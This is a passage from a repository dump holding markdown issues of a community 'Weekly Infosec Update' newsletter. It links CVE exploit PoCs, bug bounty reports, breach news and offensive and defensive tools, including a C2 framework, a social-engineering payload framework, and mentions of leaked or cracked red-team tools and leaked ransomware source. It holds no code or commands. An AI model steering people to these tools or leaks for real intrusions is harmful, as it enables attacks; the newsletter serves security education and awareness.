[Cyber Security Career Pathways](https://blog.marcolancini.it/2022/blog-cyber-security-career-pathways/) \n > Marco lanchi shows his consern over organizations trying to sell their certifications and drafted a mindmap below is a first attempt at grouping roles into macro-functions commonly found in tech companies.\n - [Which part of the security community are you in?](https://www.philvenables.com/post/field-guide-to-the-various-communities-of-security)\n > Field Guide to the Various Communities of Security\n - [How to get Cyber Security Job at Google](https://pentestingguide.com/how-to-get-google-cyber-security-jobs/)\n > If you want to become a hacker, bug bounty hunter or cyber security analyst and your dream job is Google, Microsoft or Facebook then this article is really going to help you.\n - [𝐎𝐒𝐂𝐏 𝐏𝐫𝐞-𝐏𝐫𝐞𝐩𝐚𝐫𝐚𝐭𝐢𝐨𝐧 𝐏𝐥𝐚𝐧 𝐚𝐧𝐝 𝐍𝐨𝐭𝐞𝐬](https://github.com/shreyaschavhan/oscp-pre-preparation-plan-and-notes)\n - [Cool Job : I(@Arl_rose) Recruit Pentesters for HackerOne](https://www.codecademy.com/resources/blog/cool-coding-job-hackerone-pentesting-community/)\n - [What does it mean to become an Intigriti partner](https://blog.intigriti.com/2022/10/04/become-intigriti-partner/)\n\n
\n \n
\n3. Bug Bounty HELPDESK by ResetHacker Community.\n
\n \n - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n - [Bug bounty Setup & hacker daily utiliy](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n - [Bug Bounty Resources, recon methodology worldlist, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n \n
\n\n \n \n \n
\n 🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️ \n \n > List of tools that satisfy the hacker purpose in every domain.👇\n \n\n> Community members test the tools and we filter out most demanding and helpful tools that satisfy the hacker Purpose in different domains.\n\n
\n1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 6 Tools\n \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n \n - [Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.](https://github.com/ergrelet/cpplumber)\n - [Ghauri](https://github.com/r0oth3x49/ghauri)\n > An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws\n - [XSLeaker](https://github.com/Philesiv/XSLeaker)\n > XSLeaker is a tool that helps to find XS-Leaks (https://xsleaks.dev/) on websites. The tool compares resource values for that a leak technique is known (e.g. number of iframes) between different states.\n - [Nuclei Template Generator Burp Plugin](https://github.com/projectdiscovery/nuclei-burp-plugin)\n - [spk aka spritzgebaeck](https://github.com/dhn/spk)\n > A small OSINT/Recon tool to find CIDRs that belong to a specific organization]\n \n
\n \n
\n2. Cloud Security - 3 Tools \n \n - **2. Cloud Security** - 3\n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. \n > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n
\n\n
\n3. Blue/Red/Purple Team, IR and Threat intelligence - 5 Tools \n \n - **3. Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n - [RedEye is a visual analytic tool supporting Red & Blue Team operations](https://github.com/cisagov/RedEye/)\n - [The Soaring Eagle C2](https://github.com/ItsCyberAli/The-Soaring-Eagle)\n > This tool for whoever wants to learn the basics regarding C2 and Malware Development, it is not intended to be used in real world scenarios and engagements you will get caught guaranteed, I developed it for learning not evasion. \n \n - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n > It is a Aggressorscript that turns the headless aggressor client into a (mostly) functional cobalt strike client. \n\n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n > varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n > Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n
\n\n
\n4. Reverse Engineering, Encryption & OSINT - 5 Tools \n \n - **4. Reverse Engineering & OSINT Tools** - 7\n - [NoRunPI: Run Your Payload Without Running Your Payload](https://github.com/ORCx41/NoRunPI)\n - [osintui: Open Source Intelligence Terminal User Interface](https://github.com/wssheldon/osintui)\n - [SteaLinG v0.3](https://github.com/De3vil/SteaLinG)\n > The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it.\n - A simple [shell script (almost) POSIX for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n > It's objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks. \n - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) \n > A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once. \n\n
\n\n
\n5. IoT, OS & Hardware - 3 \n \n - **5. IoT, OS & Hardware** - 4\n \n - [Open Athena](https://github.com/mkrupczak3/OpenAthena) \n > It is a project which allows consumer and professional drones to spot precise locations through their images. This is accomplished by combining their sensor metadata (https://github.com/mkrupczak3/OpenAthena/blob/main/drone_sensor_data_blurb.md) with an offline-ready Digital Elevation Model (https://github.com/mkrupczak3/OpenAthena/blob/main/EIO_fetch_geotiff_example.md) to provide the instant location of what is being observed\n\n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n > Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n > Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n
\n\n---\n \n
\n 🤝🤝🤝 Team/Contributor and Community Engagement patners and resources that help drafting Weekly Infosec Update.🤝🤝🤝 \n\n> Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n
\n \n ---\n\n#### Wrapping Up\n

\n \n
\nHave questions, Suggestions, feedback or want to contribute? Just reply directly to mail (resethackeroffical@gmail.com), I'd love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ?? Thanks for reading!\n \n \n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_11.md", "content": "#### Hey Hackers, I hope you have all enjoyed your Diwali celebrations!! \n > Here are the agenda for *Weekly infosec Update v0.7* : **19th October- 25th October 2022**\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\n**Tips to SAVE TIME & How to READ this Newsletter? ??**\n- Select the topic from the **Navbar** bellow and click on **Summary/Preview** and **Arrow (>)** to see the Details:\n\n- Open all relevant Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n**Every Week our team filter out latest IT security CVEs POC, update on patchted security, writeups & analysis of cve that has been discovered, written or found by community members. Format we follow** :\n\n### Week -> [**19th October- 25th October 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)👈.\n\n \n Security patched within a week: \n \n > We have tracked the latest Security advisory of top vendors and filter out high and critical vulnerability that has been patched.\n > This week, we have update from Morzilla, Microsoft, Jenkins, Github, Cisco, Linux(Ubuntu 22.4,20.4& 18.4 LTE) & CISA advisories.\n\n\n\n CVE Analysis, writeups and reports \n \n > (A total of 6 CVE in this week)\n \n > This week, we have collected the recently discovered write-ups for cve that have critical or higher severity. \n\n\n \n Poc for cve & exploit \n \n > (A total of 12 new 0-day in this week) :\n \n > Every week, we're tracking the recetly discovered exploit and poc for cve and exploit. \n\n\n
\nSummary/Preview\n \n > Week -> [**19th October- 25th October 2022**](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md) 👈.\n\n \n CVE:ANALYSIS & POC: CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969 \n \n CVE-2022-3236 & CVE-2022-36966. \n\n \n CVE POC (0-Day): 7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits, \n \n CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422(google crome).\n \n\n
\n\n---\n\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n > In this segment, We have collected relevant and latest article/whitepaper/research/technique/resources from all the infosec domains for independent researcher and professionals those who want to stay upto date with latest security, looking for a new approach to find CVE/bug, want to track the Infosec market and startups. \n
\n1 - Infosec Business, funded and Market \n \n - **1 - Infosec Business, funded and Market** \n \n - [Top cybersecurity trends for 2023](https://www.spiceworks.com/it-security/cyber-risk-management/guest-article/the-top-cybersecurity-trends/) \n > Where Taylor Hersom talked mentioned multiple reports such as Q1 2022 resulted from cyberattacks,Persistent Phishing, The Digital Supply Chain Problem, The Cybersecurity Mesh and Distributed Approach.\n\n - What Does It Mean To [‘Invest In Cybersecurity’ In 2022 And Beyond?](https://www.forbes.com/sites/theyec/2022/10/19/what-does-it-mean-to-invest-in-cybersecurity-in-2022-and-beyond/?sh=571ea1b51eb5)\n\n - [A comparison of cybersecurity regulations](https://law.asia/comparison-cybersecurity-regulations/)\n\n - Gartner Survey Finds [88% of Boards of Directors View Cybersecurity as a Business Risk](https://www.gartner.com/en/newsroom/press-releases/2022-10-19-gartner-says-89-percent-of-board-directors-say-digital-is-embedded-in-all-business-growth-strategies)\n \n - **Infosec Market Helpdesk** \n \n - The Cybersecurity Market Size is Expected to Hit US$266.2 Billion by 2027, reflecting a constant-currency compound annual growth rate of 11% from 2021.\n \n - The global cybersecurity workforce gap has increased by 26.2% compared to 2021, with 3.4 million more workers needed to secure assets effectively, according the [(ISC)2 2022 Cybersecurity Workforce Study](https://www.isc2.org//-/media/ISC2/Research/2022-WorkForce-Study/ISC2-Cybersecurity-Workforce-Study.ashx)\n > This represents a stark increase in the shortage of cybersecurity professionals compared to 2021, which stood at 2.72 million. The research surveyed 11,779 individuals responsible for cybersecurity.\n \n - [Report from ReportLinker](https://www.reportlinker.com/p06352700/Global-Artificial-Intelligence-In-Cybersecurity-Market-Size-Share-Industry-Trends-Analysis-Report-By-Offering-By-Vertical-By-Application-By-Type-By-Technology-By-Regional-Outlook-and-Forecast-.html) \n > The Global Artificial Intelligence In Cybersecurity Market size is expected to reach $57.1 billion by 2028, rising at a market growth of 24.5% CAGR during the forecast period\n \n - This research share the insight of [Indian Market, client and help you understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n \n - Investers and Venture capital(VC) for cybersecurity STARTUP : [Liberty City Ventures](https://www.libertycityventures.com/), [Evolution Equity](https://evolutionequity.com/), [M12VC](https://m12.vc/), [Team8.VC](https://team8.vc/), [Centerstone Capital](https://www.centerstone.capital/), [Insight partners](https://www.insightpartners.com/), [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/) etc.\n \n
\n \n
\n 2. Research/Article discussed by professionals or independent researchers \n \n - **1 - Web Security and android security**\n \n - [Analysis of thousands of active API tokens leaked via public package repositories](https://jfrog.com/blog/jas-secrets-detection-reveals-active-tokens/)\n - [Bringing Modern Authentication APIs (FIDO2 WebAuthn, Passkeys) to Linux Desktop](https://github.com/AlfioEmanueleFresta/xdg-credentials-portal)\n - [HTTP/3 connection contamination: an upcoming threat](https://portswigger.net/research/http-3-connection-contamination)\n - RPC Toolkit - [security research oriented resources on MS-RPC (articles, PoCs, vulnerability write-ups, tools, etc.)](https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit)\n - postMessage Braindump - [a brief postMessage testing methodology](https://rhynorater.github.io/postMessage-Braindump)\n - [Userland Execution of Binaries Directly from Python](https://www.anvilsecure.com/blog/userland-execution-of-binaries-directly-from-python.html)\n - In a nutshell: [data protection, privacy and cybersecurity in India](https://www.lexology.com/library/detail.aspx?g=b06b310c-76d0-4625-8b21-b0dba79bdf52)\n - SANS released a survey [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n\n\n - **2 - Cloud Security & Automation**\n - [Kubernetes CRD validation with CEL and kubebuilder marker comments](https://blog.rewanthtammana.com/kubernetes-crd-validation-with-cel-and-kubebuilder-marker-comments)\n - [How an Attacker Can Achieve Persistence in Google Cloud Platform (GCP) with Cloud Shell](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)\n - [October : Google Cloud Latest news & Update](https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud)\n \n - **3 - Blue/Red/Purple/Threat Intelligence Team**\n - **Blue Team** \n - [Verizon 2022 Data Breach Investigations Report (DBIR)](https://www.verizon.com/business/resources/reports/dbir/2022/master-guide/)\n - [How to Investigate Insider Threats (Forensic Methodology)](https://www.inversecos.com/2022/10/how-to-investigate-insider-threats.html) \n - [How a Microsoft blunder opened millions of PCs to potent malware attacks](https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/)\n - [Microsoft Defender adds command and control traffic detection](https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-adds-command-and-control-traffic-detection/)\n - [Microsoft Office 365 Message Encryption Insecure Mode of Operation](https://labs.withsecure.com/advisories/microsoft-office-365-message-encryption-insecure-mode-of-operation)\n - [#StopRansomware: Daixin Team](https://www.cisa.gov/uscert/ncas/alerts/aa22-294a)\n \n - **Red Team**\n - [Environment configuration for Red Team Cyber Security testings and tasks](https://github.com/zackjmccann/red-team-security)\n - [Genshin Impact Art Stolen Via AI, Thief Claims To Be Artist](https://kotaku.com/genshin-impact-fanart-ai-generated-stolen-twitch-1849655704)\n - A Detailed [Analysis of the Gafgyt Malware Targeting IoT Devices](https://securityscorecard.pathfactory.com/all/gafgyt-iot-devices)\n - Reverse Engineering the [Apple MultiPeer Connectivity Framework](https://www.evilsocket.net/2022/10/20/Reverse-Engineering-the-Apple-MultiPeer-Connectivity-Framework/)\n - [Transform P3 P4 P5 vulnerabilities to P1](https://www.acceis.fr/transform-p3-p4-p5-vulnerabilities-to-p1/) \n > Article by ACCEIS explaining how to steal user sessions by chaining low risk vulnerabilities.\n - [Hidden DNS resolvers and how to compromise a fully-patched WordPress instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n \n - **4. HelpDesk**\n - [Pentesting HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/Readme.md) By Resethacker Community\n - A list of [Privacy & Security Resources](https://docs.hackliberty.org/books/privacy-security/page/privacy-security-resources) \n \n
\n\n---\n\n### Friendly Segment\n > We have tried to solve the problem \"How to stay upto date with latest Bug Bounty Community without wasting time on social media\" and this segment is friend for Intermidiate bug hunters and ethical hacker where NEWS and TOOLS segment are common for professional and intermidiate.\n
\n \n📰📰📰 Hackers NEWS 📰📰📰 \n \n > Based on hacker requirenment, we have reseted infosec news into 5 differrent segment👇\n \n\n
\n 1. Top 6 infosec News \n \n - WhatsApp was down for almost a couple of hours. The glitch caused 30,000+ users reporting issues with sending and receiving texts on the whatsapp application.\n - BlueBleed: Microsoft confirmed data leak exposing customers’ info\n > The IT security researchers at SOCRadar have identified a treasure trove of data belonging to the technology giant Microsoft that was exposed online – Thanks to a database misconfiguration – The researchers have dubbed the incident “BlueBleed.”\n - Fobes in a blog post, told [Cybersecurity Must Become A Top Priority In Healthcare](https://www.forbes.com/sites/saibala/2022/10/24/cybersecurity-must-become-a-top-priority-in-healthcare/?sh=40d6b2b23b57)\n - After [USA](https://drive.google.com/file/d/1FdPbmXiQBuWz7hXM3h3S3Ubb09vZgrHK/view?usp=sharing) now UK released their yearly [National Security Strategy](https://drive.google.com/file/d/1Cv9FsRcy3ar-4NX3Hp3e9C1kPW30oMBg/view?usp=sharing)\n > It talk about the plans, alies and partners of UK in every region of the world.\n - Cybersecurity Startup Snyk Lays Off 198 Workers.\n - More than 7 in 10 cybersecurity incident responders in India say they have experienced extreme or considerable mental strain as a result of responding to a major hacking incident, reveals an IBM study. \n \n
\n \n
\n 2. Event recap \n \n > This Week Haxacon 2022, mWISE 2022 and BountyCon slides was mainly trending among community and we have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n - **Conferences**\n \n - Haxacon 2022 : Pdf\n - I feel a draft. Opening the doors and windows [0-click RCE on the Tesla Model3](https://www.synacktiv.com/sites/default/files/2022-10/tesla_hexacon.pdf)\n - Hara-Kirin: [Dissecting the Privileged Components of Huawei Mobile Devices](https://www.hexacon.fr/slides/22-Hexacon-Hara-Kirin_Dissecting_the_Privileged_Components_of_Huawei_Mobile_Devices.pdf)\n - AirbusSecLab: [Security Deep-Dive Into The Internals Of NetBackup](https://airbus-seclab.github.io/netbackup/Hexacon2022-The_unavoidable_pain_of_backups_security_deep-dive_into_the_internals_of_NetBackup.pdf)\n - Toner Deaf: [Printing your next persistence](https://research.nccgroup.com/2022/10/17/toner-deaf-printing-your-next-persistence-hexacon-2022/)\n - [Hacking the Cloud With SAML](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG-ZZdMXn/view?usp=drivesdk)\n \n - Mandiant [mWISE 2022 highlights supply chain risk and mental health](https://securitybrief.asia/story/exclusive-mwise-2022-highlights-supply-chain-risk-and-mental-health) \n > Recap for mWISE Cybersecurity Conference 2022(previously the Cyber Defense Summit) : 18th-20th October | Washington DC \n > Meta [iOS Hacking talk from BountyCon by @phwd_](https://docs.google.com/presentation/d/1PPsyLhTxMAk1IyIp6p5ls0dhnqm3xVQKb8rE9z-N548/)\n \n - **Webinars and videos**\n - Cybersecurity [public speaking techniques | Guest Lisa Tetrault](https://youtu.be/E6EfJyFjvDc) \n\n - **Ongoing/Upcomming**: \n \n - IT-SA : 25th to 27th October | Nuremberg, DE \n\n
\n \n
\n 3. Twitter Threads, News, Anouncement & Tips 🟢\n \n \n - Announcement 🟢 :\n - Black Reward, an [Iranian hacker group, claims to have breached the Iranian government and exfiltrated sensitive data related to their nuclear programs.](https://twitter.com/vxunderground/status/1583568821675126784)\n - Windows Terminal Now [Default in Windows 11](https://devblogs.microsoft.com/comman) and [Windows Terminal on GitHub](https://github.com/microsoft/terminal)\n \n - Threads, Resources, News & Tips 🟢 :\n \n - ResetHacker community [wishes happy diwali to community after 1 year](https://twitter.com/resethacker/status/1584185937692880899)\n - Jack Hacks releasing a [3-part of browser exploitation series on Chrome!](https://t.co/bbFjOOzlOu) This was written to help beginners break into the browser exploitation field. where Part 1 covers V8 internals such as objects, properties, and memory optimizations. Enjoy! \n - Tuan Anh Nguyen shared a thread where he mentioned [Spring Boot Actuators Misconfiguration is another gold mine in bug bounty.](https://twitter.com/haxor31337/status/1584578975992803328)\n - Froggy Trying to [build an Attack surface management Tool](https://twitter.com/iamthefrogy/status/1581768423649837056)\n\n \n
\n \n
\n 4. Update on Data breach & Blackhat hackers Leaked 👇🔴\n \n \n - 🔴 **Update - Paid Tools** that has been leaked or cracked by Black Hat Hackers : \n > Cobaltstrike 4.7.2 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, Acunetix Version 15 build 15.0.221007170 for Windows and Linux – 13th October 2022, BurpSuite_pro_v2022_9.4, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense x32/x64 v3.1.3.0, bruteratel 1.2.2, and 010 Editor 13.0-beta2, cellebrite | UEFD, IDA Pro 8.0.\n \n - 🔴 **Update - Black Hat Hacker leaked & activity** : 4\n\n - HIVE ransomware group has ransomed Tata Power, a multi-billion dollar electric utility company based in Mumbai, India.\n > Tata's confirmed the breach. Customers and sensitive data are effected, but core functionality is present and customers still have electricity.\n - Indonesian nuclear agency internal files leak\n > These 1.4 gb worth of files regarding the Nuclear power authority in Indonesia are being leaked in response to police brutality and corruption by the Indonesian government.\n - We have verified the Indian government and military defence data mega leak \n > Includes all kinds of top secret, secret and confidential documents from the following sectors, ALISDA, DGAQA, MSQAA, DRDO,DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n - Conti source code for v3.7.7, Ransomeware builder tools has been circulated around private group and Taurus bot source code has been leaked. \n \n
\n \n
\n\n5. Hiring/Jobs\n\n \n> In this beginners friendly segment, we talk about and share latest resources related to jobs in this month, interview questions and free trainning offered by organization, community and leader.\n \n - 1. Take a Look at [Internship/Job Opening in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n \n
\n
\n\n\n
\n 🐞🐞🐞 BUG BOUNTY 🐞🐞🐞 \n \n > Everything related to Bugbounty : report, witeups and resources??\n \n\n
\n 1. Hackerone/Bugcrowd reports wroth reading for Bug Hunters. : 4 Reports \n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n - 🐞 $13,000 weakness : Authentication Bypass Using an Alternate Path or Channel on Stripe where the **impact** was [Mass Accounts Takeover Without any user Interaction at https://app.taxjar.com/](https://hackerone.com/reports/1685970)\n - 🐞 $2,000 **weakness** : Command Injection - Generic on Hyperledger where the **impact** was [POOL_UPGRADE request handler may allow an unauthenticated attacker to remotely execute code on every node in the network.](https://hackerone.com/reports/1705717)\n - 🐞 $1,000 **weakness** :Server-Side Request Forgery (SSRF) on Acronis where the **impact** was [mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040](https://hackerone.com/reports/1719719)\n - 🐞 $1,000 **weakness** :SQL Injection on U.S. Dept Of Defense where the **impact** was [Unauthenticated SQL Injection at █████████ [HtUS]](https://hackerone.com/reports/1719719)\n
\n \n
\n2. BUG BOUNTY : writeups, tips & resources. \n \n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n - **Writeups : 11 ** :\n - A journey of [fuzzing Nvidia graphic driver leading to LPE exploitation](https://github.com/quarkslab/conf-presentations/blob/master/Hexacon-2022/hexacon_2022_a_journey_of_fuzzing_nvidia_graphic_driver.pdf)\n - Regulator: [A unique method of subdomain enumeration](https://cramppet.github.io/regulator/index.html)\n - Subdomain Enumeration [Tool Face-off 2022](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)\n - SSRF - [Case study of 124 bug bounty reports](https://t.me/resethacker/932) By Grzegorz Niedziela founder of Bug Bounty Reports Explained.\n - 23000$ for [Authentication Bypass & File Upload & Arbitrary File Overwrite](https://medium.com/@h4x0r_dz/23000-for-authentication-bypass-file-upload-arbitrary-file-overwrite-2578b730a5f8)\n - Google [SSO misconfiguration leading to Account Takeover](https://medium.com/@0x4kd/google-sso-misconfiguration-leading-to-account-takeover-cf9bcf63e76e)\n - Facebook [SMS Captcha Was Vulnerable to CSRF Attack](https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980)\n - [Appsmith Patches Full-Read SSRF Vulnerabilities Reported by CloudSEK](https://cloudsek.com/appsmith-patches-full-read-ssrf-vulnerabilities-reported-by-cloudsek/)\n - [Error based SQL Injection with WAF bypass manual Exploit 100%](https://c0nqr0r.medium.com/error-based-sql-injection-with-waf-bypass-manual-exploit-100-bab36b769005)\n - [Story about Escalation of HTML Injection to EC2 Instance credentials leak](https://medium.com/@Cybervenom/story-about-escalation-of-html-injection-to-ec2-instance-credentials-leak-e2cbd7343a83)\n - Firing 8 [Account Takeover Methods](https://0xmaruf.medium.com/firing-8-account-takeover-methods-77e892099050)\n\n \n - **New Resources Found + Non -Technical : 4**\n - [OSCP Exam Change | Offensive Security](https://www.offensive-security.com/offsec/oscp-exam-structure/)\n - [Cyber Security Career Pathways](https://blog.marcolancini.it/2022/blog-cyber-security-career-pathways/) \n > Marco lanchi shows his consern over organizations trying to sell their certifications and drafted a mindmap below is a first attempt at grouping roles into macro-functions commonly found in tech companies.\n - [Which part of the security community are you in?](https://www.philvenables.com/post/field-guide-to-the-various-communities-of-security)\n > Field Guide to the Various Communities of Security\n - [How to get Cyber Security Job at Google](https://pentestingguide.com/how-to-get-google-cyber-security-jobs/)\n > If you want to become a hacker, bug bounty hunter or cyber security analyst and your dream job is Google, Microsoft or Facebook then this article is really going to help you.\n\n\n
\n \n
\n3. Bug Bounty HELPDESK by ResetHacker Community.\n
\n \n - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n - [Bug bounty Setup & hacker daily utiliy](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n - [Bug Bounty Resources, recon methodology worldlist, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n \n
\n\n \n \n \n
\n 🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️\n \n > List of tools that satisfy the hacker purpose in every domain.👇\n \n\n> Community members test the tools and we filter out most demanding and helpful tools that satisfy the hacker Purpose in different domains.\n\n
\n1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools\n \n - Janus : [String obfuscation tool based off the CIA's Marble Framework](https://github.com/echtdefault/Janus)\n - vaf : [A fast, simple, and feature rich web fuzzer written in nim](https://github.com/d4rckh/vaf)\n > Features:▫️ Fast threading.▫️ HTTP header fuzzing,▫️ Proxying,▫️ your own feature And more...\n - [ext4Shell scanner for Burp Suite](https://github.com/silentsignal/burp-text4shell)\n - [Ghauri](https://github.com/r0oth3x49/ghauri)\n > An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws.\n - [XSLeaker](https://github.com/Philesiv/XSLeaker)\n > XSLeaker is a tool that helps to find XS-Leaks (https://xsleaks.dev/) on websites. The tool compares resource values for that a leak technique is known (e.g. number of iframes) between different stat\n \n
\n \n
\n2. Cloud Security - 3 Tools \n \n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. \n > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n
\n\n
